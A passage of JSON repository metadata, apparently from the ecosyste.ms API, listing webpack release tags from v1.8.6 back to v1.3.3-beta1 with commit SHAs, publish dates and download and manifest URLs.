,"manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.git